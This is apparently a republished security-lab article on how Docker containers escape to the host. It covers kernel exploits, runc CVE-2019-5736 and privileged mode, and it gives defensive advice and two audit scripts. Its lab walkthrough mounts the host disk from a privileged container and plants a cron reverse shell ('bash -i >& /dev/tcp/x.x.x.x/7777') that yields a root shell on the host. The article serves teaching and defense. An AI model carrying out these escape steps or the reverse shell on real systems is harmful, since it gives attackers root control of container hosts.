Meituang Security Lab | Docker Escape Principle

2025-03-29 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/02 Report

Docker is one of the most widely used open source container technologies; it is efficient and easy to use. It is often assumed that Docker is inherently secure, even more secure than a virtual machine. That assumption does not hold: a container shares the host's kernel, the "indestructible" Docker can be breached, and a Docker escape affects every deployment that runs containers. In this issue, Meituang Security Lab walks through the basic principles of Docker escape and the corresponding defenses.

Introduction to Docker

Docker is a container platform; its official definition is packaging software into standardized units for development, shipment and deployment. Containers have a uniform format, start quickly, need few resources, and their images are built from layers stacked on top of one another.

Compared with the virtual machine architecture, the overall architecture of Docker is lighter and more flexible. Because Docker uses the host's kernel directly instead of booting a guest kernel, it can create a large number of containers in a few seconds; container start-up is an order of magnitude faster than that of a virtual machine.

Comparison of virtual machine and Docker architecture (figure: virtual machine architecture on the left, Docker architecture on the right)

Docker escape principle

Docker relies on kernel isolation mechanisms (namespaces, cgroups, capabilities): processes inside a container cannot see processes outside it, while processes on the host can see into the container. If a process in a container can nevertheless access resources outside the container, or even obtain privileges on the host, this is called a "Docker escape".

At present there are three causes of Docker escape:

First, kernel vulnerabilities.

Second, flaws in the design or implementation of the Docker software itself.

Third, privileged mode and other insecure configuration.

Next, we briefly explain each of the three escape methods in turn.

01 Escape caused by kernel vulnerabilities

Because a container shares the host kernel directly, a security vulnerability in the host kernel also affects every container on that host and may lead to a Docker escape. A typical kernel-exploit escape proceeds as follows:

① exploit the kernel vulnerability to run code in kernel context

② locate the task_struct of the current process

③ walk the task list back to the task_struct of pid 1 and copy its relevant data (credentials and namespace references)

④ switch the current process into those host namespaces

⑤ spawn a root shell; the escape is complete

02 Escape caused by Docker software design

A typical example is runc, the standardized container runtime that Docker uses to execute containers. In February 2019 runc was found to have the escape vulnerability CVE-2019-5736; Docker, containerd and every other runc-based runtime were affected. The root cause is that runc, running as root on the host, executes the container's process from inside the container's namespaces. A malicious image, or a crafted target for a `docker exec`, can make that process be `/proc/self/exe`, which is runc itself; a process inside the container can then obtain a file descriptor to the host's runc binary through /proc and, once runc exits, overwrite it. The next time runc is started on the host, for any container, the attacker's code runs as root on the host, completing the escape.

03 Escape caused by privileged mode + directory mount

This method of escape is the most practical of the three. Privileged mode was introduced in Docker 0.6. Its core effect is that root inside the container gains essentially the same power as root on the host. Without it, root in a container is still uid 0, but it runs with a reduced capability set, a seccomp profile and restricted access to devices, so it cannot do most of what host root can do.

When a container is started in privileged mode (`docker run --privileged`), it is allowed to access all devices on the host: the host's device files appear under /dev inside the container, and the container may execute the mount command.

An attacker who controls a privileged container can therefore mount a host disk device into the container and obtain read and write access to the host's entire filesystem. From there, commands can be executed on the host, for example by writing a scheduled task into the host's cron spool.

Privileged mode is not the only way to reach this state; the Linux capability mechanism can produce the same result. The Linux kernel introduced capabilities in version 2.2. They split the all-or-nothing superuser of classic UNIX/Linux into individual privileges, so that a process can be granted only the specific operations it needs instead of full root. Docker grants containers a small default set, and adding to it re-enables dangerous operations. For example, when a container is started with `--cap-add=SYS_ADMIN`, the container process may call mount, umount and a series of other system-management operations; if the attacker then mounts a host device directory inside the container, the escape proceeds exactly as in privileged mode.
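To check from inside a container which of these capabilities a process actually holds, the following script decodes the CapEff bitmask the kernel exposes in /proc/self/status. It is an added example, not code from the original article. The capability bit numbers come from the kernel's capability.h (CAP_SYS_ADMIN is bit 21); the function names are this example's own, and the masks used in the usage note are constructed values (0x00000000a80425fb is the usual default Docker set, 0x0000003fffffffff a fully privileged mask).

```shell
#!/bin/sh
# Added example (not from the original article): decode the effective capability
# mask (CapEff) of a process and flag the capabilities that make a mount-based or
# ptrace-based escape possible. Bit numbers follow include/uapi/linux/capability.h.

CAP_DAC_READ_SEARCH=2   # bypass file read permission checks (open_by_handle_at)
CAP_NET_ADMIN=12
CAP_SYS_MODULE=16       # load kernel modules
CAP_SYS_PTRACE=19       # ptrace other processes, e.g. those of pid 1's namespace
CAP_SYS_ADMIN=21        # mount, umount and most other admin operations

# has_cap HEXMASK BIT -> exit 0 if BIT is set in the hex mask (the CapEff value).
has_cap() {
    mask="$1"; bit="$2"
    [ $(( (0x$mask >> bit) & 1 )) -eq 1 ]
}

# dangerous_caps HEXMASK -> prints the names of risky capabilities present in
# the mask, space-separated, in the order listed below; empty when none is set.
dangerous_caps() {
    mask="$1"; out=""
    for pair in "SYS_ADMIN:$CAP_SYS_ADMIN" "SYS_PTRACE:$CAP_SYS_PTRACE" \
                "SYS_MODULE:$CAP_SYS_MODULE" "NET_ADMIN:$CAP_NET_ADMIN" \
                "DAC_READ_SEARCH:$CAP_DAC_READ_SEARCH"; do
        name="${pair%%:*}"; bit="${pair##*:}"
        has_cap "$mask" "$bit" && out="$out $name"
    done
    printf '%s\n' "${out# }"
}

# current_capeff -> the CapEff hex value of the calling process (empty if
# /proc/self/status is unavailable, e.g. outside Linux).
current_capeff() {
    awk '/^CapEff:/ { print $2 }' /proc/self/status 2>/dev/null
}

# report_self: what a shell inside a container would run to assess itself.
report_self() {
    mask="$(current_capeff)"
    [ -n "$mask" ] || { echo "no /proc/self/status; not Linux?"; return 1; }
    found="$(dangerous_caps "$mask")"
    if [ -n "$found" ]; then
        echo "CapEff=$mask: escape-relevant capabilities present: $found"
    else
        echo "CapEff=$mask: no escape-relevant capabilities"
    fi
}
```

Run `report_self` inside a container started with and without `--privileged` or `--cap-add=SYS_ADMIN` to see the difference; `dangerous_caps 00000000a80425fb` prints nothing for the default Docker set, while `dangerous_caps 0000003fffffffff` lists all five.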

Docker Escape experiment (privileged mode + directory mount)

Target machine: 192.168.210.37

The Docker daemon on the target is exposed on TCP port 2375. No authentication is required, so Docker information can be read, and commands issued, simply by connecting to that port. The steps are as follows:

List the images present on the target daemon: docker images

Start a container from one of them in privileged mode.

View the host's disks from inside the container: fdisk -l

The output shows the host partitions sda1, sda2 and sda3 as device files under /dev.

Create a new directory /test and mount /dev/sda1 on it:

mkdir /test

mount /dev/sda1 /test

Listing the new directory /test now shows content belonging to the host (in the lab, the contents of the host's /root directory).

Similarly, create a new directory /test2 and mount /dev/sda3 on it; listing /test2 shows the contents of the host's / directory.

Write a reverse shell into the host's root crontab through the mounted filesystem:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1' >> /test2/var/spool/cron/root

Listen with netcat on port 7777 on the attacker machine. Within a minute cron on the host runs the entry, a root shell from the host arrives, and the Docker escape is complete.

Docker Escape Defense

➢ Update Docker to 19.03.1 or later. That release fixes CVE-2019-14271 (docker cp) and includes the fix for CVE-2019-5736, which first shipped in Docker 18.09.2.

➢ Use runc 1.0-rc7 or later, or a distribution build of 1.0-rc6 that carries the CVE-2019-5736 patch.

➢ Run a Kubernetes cluster newer than version 1.12.

➢ Patch the kernel against CVE-2016-5195 (Dirty COW). It affects kernels from 2.6.22 onward and was fixed in 4.8.3, 4.7.9, 4.4.26 and in distribution backports.

➢ Patch the kernel against CVE-2017-1000405 (Huge Dirty COW), fixed in 4.14.2 and in distribution backports. No public Docker escape using it has been found, but the risk of escape exists.

➢ Avoid running the Docker daemon as root where possible (rootless mode).

➢ Do not start containers with --privileged.

➢ Do not bind-mount host directories into containers, especially sensitive ones such as /, /dev, /etc and the Docker socket.

➢ Do not start containers with --cap-add=SYS_ADMIN: it lets the container process run mount, umount and a series of other system-management operations, and so carries the risk of container escape.

➢ Do not expose the Docker daemon API on tcp/2375 without TLS client authentication; the experiment above begins with exactly that misconfiguration.
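To find these configurations on a host rather than rely on policy alone, here is an audit script, added as an example and not part of the article, that renders each container's settings with a `docker inspect` template and flags --privileged, an added SYS_ADMIN capability, and sensitive host paths mounted into the container; it also reports the unauthenticated tcp/2375 listener the lab above relied on. The template, the function names and the list of risky host paths are assumptions made for this example; the inspect line quoted in the comments is constructed, not captured output.

```shell
#!/bin/sh
# Added example (not from the original article): audit a Docker host for the
# escape enablers listed above. The inspect template and the list of risky host
# paths are assumptions made for this example.

# One line per container:
#   <name> privileged=<bool> caps=[<CapAdd entries>] mounts=<host src>,<host src>,
INSPECT_FMT='{{.Name}} privileged={{.HostConfig.Privileged}} caps={{.HostConfig.CapAdd}} mounts={{range .Mounts}}{{.Source}},{{end}}'

# audit_line LINE -> one finding per line of output, nothing when clean.
# Constructed input example (what the template above renders for the lab's
# container): "/escape privileged=true caps=[SYS_ADMIN] mounts=/dev,/,"
audit_line() {
    line="$1"
    name="${line%% *}"
    case " $line " in
        *" privileged=true "*) echo "$name: started with --privileged" ;;
    esac
    # CapAdd renders as [SYS_ADMIN NET_ADMIN] or []; CAP_SYS_ADMIN spelling also matches
    case "$line" in
        *caps=\[*SYS_ADMIN*\]*) echo "$name: --cap-add=SYS_ADMIN (mount/umount allowed)" ;;
    esac
    mounts="${line##*mounts=}"
    old_ifs=$IFS; IFS=,
    for src in $mounts; do
        case "$src" in
            /|/dev|/dev/*|/proc|/sys|/etc|/root|/var/run/docker.sock|/run/docker.sock)
                echo "$name: host path mounted into container: $src" ;;
        esac
    done
    IFS=$old_ifs
}

# audit_host: run audit_line over every running container on the local daemon
# and check whether dockerd is reachable on tcp/2375 as in the lab.
audit_host() {
    docker ps -q | xargs -r docker inspect --format "$INSPECT_FMT" \
        | while IFS= read -r l; do audit_line "$l"; done
    if ss -ltn 2>/dev/null | grep -q ':2375 '; then
        echo "dockerd listens on tcp/2375: anyone who can reach it controls the host"
    fi
}
```

`audit_host` needs the Docker CLI and `ss` on the host; `audit_line` can be fed saved inspect output, so the same checks run offline over exported configuration. The Docker socket entry in the path list matters because a container holding /var/run/docker.sock can start a new privileged container itself.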
